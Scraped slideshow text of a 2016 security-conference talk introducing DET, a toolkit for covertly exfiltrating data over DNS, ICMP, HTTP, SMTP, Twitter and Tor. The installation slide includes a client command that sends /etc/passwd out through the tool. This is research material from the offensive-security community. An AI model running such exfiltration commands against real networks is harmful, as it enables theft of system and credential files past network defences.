Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Introducing (DET) the Data Exfiltration Toolkit

2,878 views

Published on

A talk by Paul Amar (@paulwebsec) about DET; a tool for stealthily exfiltrating data from internal network, at BSides Ljubjana 2016.

Published in: Technology
  • Be the first to comment

Introducing (DET) the Data Exfiltration Toolkit

  1. 1. Introducing DET (Data Exfiltration Toolkit) Paul Amar - BSides Ljubjana - 09/03/2016
  2. 2. 100
  3. 3. General Approach TCP DNS HTTP ICMP SMTP
  4. 4. General Approach TCP DNS HTTP ICMP SMTP
  5. 5. General Approach TCP DNS HTTP ICMP SMTP
  6. 6. General Approach TCP DNS HTTP ICMP SMTP
  7. 7. General Approach TCP DNS HTTP ICMP SMTP
  8. 8. General Approach TCP DNS HTTP ICMP SMTP
  9. 9. HammerToss (July 2015)
  10. 10. What’s available today?
  11. 11. What’s available today? And many more.. created almost everyday. Not kidding.
  12. 12. Current state TCP DNS HTTP ICMP Twitter DMs SMTP (eg. Gmail)
  13. 13. Introducing DET
  14. 14. Configuration file (JSON format)
  15. 15. File to exfiltrate
  16. 16. Folder to exfiltrate / multi-threaded
  17. 17. Plugin(s) to use
  18. 18. Plugin(s) to exclude
  19. 19. Server mode
  20. 20. Configuration file List all your plugins and their configuration
  21. 21. Configuration file Each plugin has its own configuration (username, pwd, …)
  22. 22. Configuration file Additional configuration (XOR Key, Sleeping time, …)
  23. 23. Let’s dig a bit (Client-side)
  24. 24. “Registration” phase 1/2
  25. 25. “Registration” phase 2/2
  26. 26. Sending the data 1/2
  27. 27. Sending the data 2/2
  28. 28. “End” phase 1/2
  29. 29. “End” phase 2/2
  30. 30. So in few words..
  31. 31. But wait! There’s moar.
  32. 32. Additional plugins (Tor Integration) 1/2 Source: http://foxglovesecurity.com/2015/11/02/hack-like-the-bad-guys-using-tor-for- firewall-evasion-and-anonymous-remote-access/
  33. 33. Additional plugins (Tor Integration) 2/2
  34. 34. “Experimental” plugins
  35. 35. What’s next - Port DET *entirely* to PowerShell (With Plugin based) (“Empire”-like) - More plugins! - Data obfuscation layer using Markov Chains - https://github.com/bwall/markovobfuscate
  36. 36. Installation Get/install it: - git clone https://github.com/sensepost/DET - pip install -r requirements --user (instal dependencies for the local user) Client side: - python det.py -f /etc/passwd -c ./config.json (or PS scripts) Server side: - python det.py -L -c ./config.json
  37. 37. sys.exit(0) Paul Amar (paul@sensepost.com) / @PaulWebSec

×